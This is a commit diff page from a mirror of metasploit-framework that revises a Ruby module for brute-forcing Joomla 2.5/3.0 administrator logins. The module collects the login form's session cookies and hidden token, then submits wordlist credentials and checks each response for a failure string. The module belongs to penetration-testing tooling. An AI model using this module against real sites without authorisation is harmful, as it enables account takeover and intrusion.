infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

implementation of the recommended changes

bug/bundler_fix
root 2014-07-17 23:36:37 -05:00
parent ceff18de9d
commit f2eabdba94
1 changed files with 93 additions and 114 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

207
modules/auxiliary/scanner/http/http_bruteforce_joomla.rb
View File

@ -17,9 +17,9 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'BruteForce Joomla 2.5 or 3.0',
'Name' => 'Joomla Bruteforce Login Utility',
'Description' => 'This module attempts to authenticate to Joomla 2.5. or 3.0 through bruteforce attacks',
'Author' => [ 'luisco100[at]gmail[dot]com' ],
'Author' => [ 'luisco100[at]gmail.com' ],
'References' =>
[
[ 'CVE', '1999-0502'] # Weak password Joomla
@ -35,15 +35,12 @@ class Metasploit3 < Msf::Auxiliary
File.join(Msf::Config.data_directory, "wordlists", "http_default_users.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "http_default_pass.txt") ]),
OptString.new('AUTH_URI', [ false, "The URI to authenticate against (default:auto)", "/administrator/index.php" ]),
OptString.new('AUTH_URI', [ true, "The URI to authenticate against (default:auto)", "/administrator/index.php" ]),
OptString.new('FORM_URI', [ false, "The FORM URI to authenticate against (default:auto)" , "/administrator"]),
OptString.new('USER_VARIABLE', [ false, "The name of the variable for the user field", "username"]),
OptString.new('PASS_VARIABLE', [ false, "The name of the variable for the password field" , "passwd"]),
OptString.new('WORD_ERROR', [ false, "The word of message for detect that login fail","mod-login-username"]),
OptString.new('WORD_ERROR_2', [ false, "Second option for the word of message for detect that login fail","login.html"]),
OptString.new('WORD_ERROR_DELAY', [ false, "The word of message for active the delay time" , "por favor intente de nuevo en un minuto"]),
OptInt.new('TIME_DELAY', [false, 'The delay time ', 0]),
OptString.new('REQUESTTYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)", "POST" ]),
OptString.new('USER_VARIABLE', [ false, "The name of the variable for the user field", "username"]),
OptString.new('PASS_VARIABLE', [ false, "The name of the variable for the password field" , "passwd"]),
OptString.new('WORD_ERROR', [ false, "The word of message for detect that login fail","mod-login-username"]),
OptString.new('REQUEST_TYPE', [ false, "Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)", "POST" ]),
OptString.new('UserAgent', [ true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0' ]),
], self.class)
register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
@ -51,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
def find_auth_uri
if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0
if datastore['AUTH_URI'] && datastore['AUTH_URI'].length > 0
paths = [datastore['AUTH_URI']]
else
paths = %W{
@ -66,15 +63,15 @@ class Metasploit3 < Msf::Auxiliary
'method' => 'GET'
}, 10)
next if not res
if res.code == 301 or res.code == 302 and res.headers['Location'] and res.headers['Location'] !~ /^http/
next unless res
if res.code == 301 || res.code == 302 && res.headers['Location'] && res.headers['Location'] !~ /^http/
path = res.headers['Location']
vprint_status("Following redirect: #{path}")
res = send_request_cgi({
'uri' => path,
'method' => 'GET'
}, 10)
next if not res
})
next unless res
end
return path
@ -85,20 +82,16 @@ class Metasploit3 < Msf::Auxiliary
def target_url
proto = "http"
if rport == 443 or ssl
if rport == 443 || ssl
proto = "https"
end
"#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
end
def run_host(ip)
if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "")
print_error("You need need to set AUTH_URI when using PUT Method !")
return
end
@uri = find_auth_uri
time_delay = datastore['REQUESTTYPE']
if ! @uri
print_error("#{target_url} No URI found that asks for HTTP authentication")
return
@ -109,8 +102,7 @@ class Metasploit3 < Msf::Auxiliary
print_status("Attempting to login to #{target_url}")
each_user_pass { |user, pass|
datastore['REQUESTTYPE'] = time_delay
do_login(user, pass)
do_login(user, pass)
}
end
@ -126,37 +118,33 @@ class Metasploit3 < Msf::Auxiliary
return :next_user
else
vprint_error("#{target_url} - Failed to login as '#{user}'")
if result == :delay
print_status("Establishing one minute delay")
userpass_sleep_interval_add
end
return
end
end
def do_http_login(user,pass)
@uri_mod = @uri
if datastore['REQUESTTYPE'] == "GET"
if datastore['REQUEST_TYPE'] == "GET"
@uri_mod = "#{@uri}?username=#{user}&psd=#{pass}"
@uri_mod = "#{@uri}?username=#{user}&psd=#{pass}"
begin
response = send_request_cgi({
'uri' => @uri_mod,
'method' => datastore['REQUESTTYPE'],
'method' => datastore['REQUEST_TYPE'],
'username' => user,
'password' => pass
})
return response
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return nil
end
return response
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return nil
end
else
begin
begin
user_var = datastore['USER_VARIABLE']
pass_var = datastore['PASS_VARIABLE']
@ -167,41 +155,42 @@ class Metasploit3 < Msf::Auxiliary
uid, cval, hidden_value = get_login_cookie
if uid
indice = 0
index_cookie = 0
value_cookie = ""
#print_status("Longitud : #{uid.length}")
uid.each do |val_uid|
value_cookie = value_cookie + "#{val_uid.strip}=#{cval[indice].strip};"
indice = indice +1
uid.each do |val_uid|
value_cookie = value_cookie + "#{val_uid.strip}=#{cval[index_cookie].strip};"
index_cookie = index_cookie +1
end
value_cookie = value_cookie
print_status("Value of cookie ( #{value_cookie} ), Hidden ( #{hidden_value}=1 )")
vprint_status("Target #{target_url},Value of cookie ( #{value_cookie} ), Hidden ( #{hidden_value}=1 )")
data = "#{user_var}=#{user}&"
data << "#{pass_var}=#{pass}&"
data << "lang=&"
data << "option=com_login&"
data << "task=login&"
data << "return=aW5kZXgucGhw&"
data << "#{hidden_value}=1"
data = "#{user_var}=#{user}&" \
"#{pass_var}=#{pass}&" \
"lang=&" \
"option=com_login&" \
"task=login&" \
"return=aW5kZXgucGhw&" \
"#{hidden_value}=1"
response = send_request_raw({
response = send_request_cgi({
'uri' => @uri_mod,
'method' => datastore['REQUESTTYPE'],
'method' => datastore['REQUEST_TYPE'],
'cookie' => "#{value_cookie}",
'data' => data,
'headers' =>
{
'Content-Type' => ctype,
'Referer' => referer_var,
'User-Agent' => datastore['UserAgent'],
},
}, 30)
'headers' =>
{
'Content-Type' => ctype,
'Referer' => referer_var,
'User-Agent' => datastore['UserAgent'],
},
})
vprint_status("First Response Code : #{response.code}")
vprint_status("#{target_url} -> First Response Code : #{response.code}")
if (response.code == 301 || response.code == 302 || response.code == 303) && response.headers['Location']
if (response.code == 301 or response.code == 302 or response.code == 303) and response.headers['Location']
path = response.headers['Location']
print_status("Following redirect Response: #{path}")
@ -209,18 +198,19 @@ class Metasploit3 < Msf::Auxiliary
'uri' => path,
'method' => 'GET',
'cookie' => "#{value_cookie}",
}, 30)
}, 30)
end
return response
else
print_error("#{target_url} - Failed to get Cookies")
end
return nil
end
rescue ::Rex::ConnectionError
vprint_error("#{target_url} - Failed to connect to the web server")
return nil
end
end
end
end
end
def determine_result(response)
@ -229,36 +219,28 @@ class Metasploit3 < Msf::Auxiliary
return :abort unless response.code
if [200, 301, 302].include?(response.code)
#print_status("Respuesta: #{response.headers}")
#print_status("Respuesta Code: #{response.body}")
if response.to_s.include? datastore['WORD_ERROR_DELAY']
return :delay
else
if response.to_s.include? datastore['WORD_ERROR'] or response.to_s.include? datastore['WORD_ERROR_2']
return :fail
else
return :success
end
end
#print_status("Response: #{response.headers}")
#print_status("Response Code: #{response.body}")
if response.to_s.include? datastore['WORD_ERROR']
return :fail
else
return :success
end
end
return :fail
end
def userpass_sleep_interval_add
sleep_time = datastore['TIME_DELAY']
::IO.select(nil,nil,nil,sleep_time) unless sleep_time == 0
end
def get_login_cookie
uri = normalize_uri(datastore['FORM_URI'])
uid = ''
cval = ''
uid = Array.new
cval = Array.new
valor_input_id = ''
res = send_request_raw({'uri' => uri,'method' => 'GET',})
res = send_request_cgi({'uri' => uri,'method' => 'GET'})
if(res.code == 301)
path = res.headers['Location']
@ -269,42 +251,39 @@ class Metasploit3 < Msf::Auxiliary
}, 10)
end
#print_status("respuesta Get login cookie: #{res.to_s}")
if res and res.code == 200 and res.headers['Set-Cookie']
#Idetificar formulario login y obtener la variable de validacion de session de Joomla
if res.body and res.body =~ /<form action=([^\>]+)\>(.*)<\/form>/mi
#form = res.body.split(/<form action=([^\>]+) id="login-form" class="form-inline"\>(.*)<\/form>/mi)
form = res.body.split(/<form action=([^\>]+) method="post" id="form-login"\>(.*)<\/form>/mi)
#print_status("#{form[1]}")
#print_status("Response Get login cookie: #{res.to_s}")
if form.length == 1 #No es Joomla 2.5
if res && res.code == 200 && res.headers['Set-Cookie']
#Identify login form and get the session variable validation of Joomla
if res.body && res.body =~ /<form action=([^\>]+)\>(.*)<\/form>/mi
form = res.body.split(/<form action=([^\>]+) method="post" id="form-login"\>(.*)<\/form>/mi)
if form.length == 1 #is not Joomla 2.5
print_error("Testing Form Joomla 3.0")
form = res.body.split(/<form action=([^\>]+) method="post" id="form-login" class="form-inline"\>(.*)<\/form>/mi)
end
if not form
print_error("Joomla Form Not Found")
form = res.body.split(/<form id="login-form" action=([^\>]+)\>(.*)<\/form>/mi)
end
input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
#print_status("Formulario Encontrado #{form[2]}")
print_status("--------> Joomla Form Found <--------")
#print_status("Campos Ocultos #{input_hidden[7]}")
input_id = input_hidden[7].split("\"")
#print_status("valor #{input_id[1]}")
valor_input_id = input_id[1]
unless form
print_error("Joomla Form Not Found")
form = res.body.split(/<form id="login-form" action=([^\>]+)\>(.*)<\/form>/mi)
end
input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
print_status("--------> Joomla Form Found <--------")
input_id = input_hidden[7].split("\"")
valor_input_id = input_id[1]
end
#Get the name of the cookie variable Joomla
uid = Array.new
cval = Array.new
#print_status("cookie = #{res.headers['Set-Cookie']}")
res.headers['Set-Cookie'].split(';').each {|c|
if c.split('=')[0].length > 10
uid.push(c.split('=')[0])
if c.split('=')[0].length > 10
uid.push(c.split('=')[0])
cval.push(c.split('=')[1])
end
}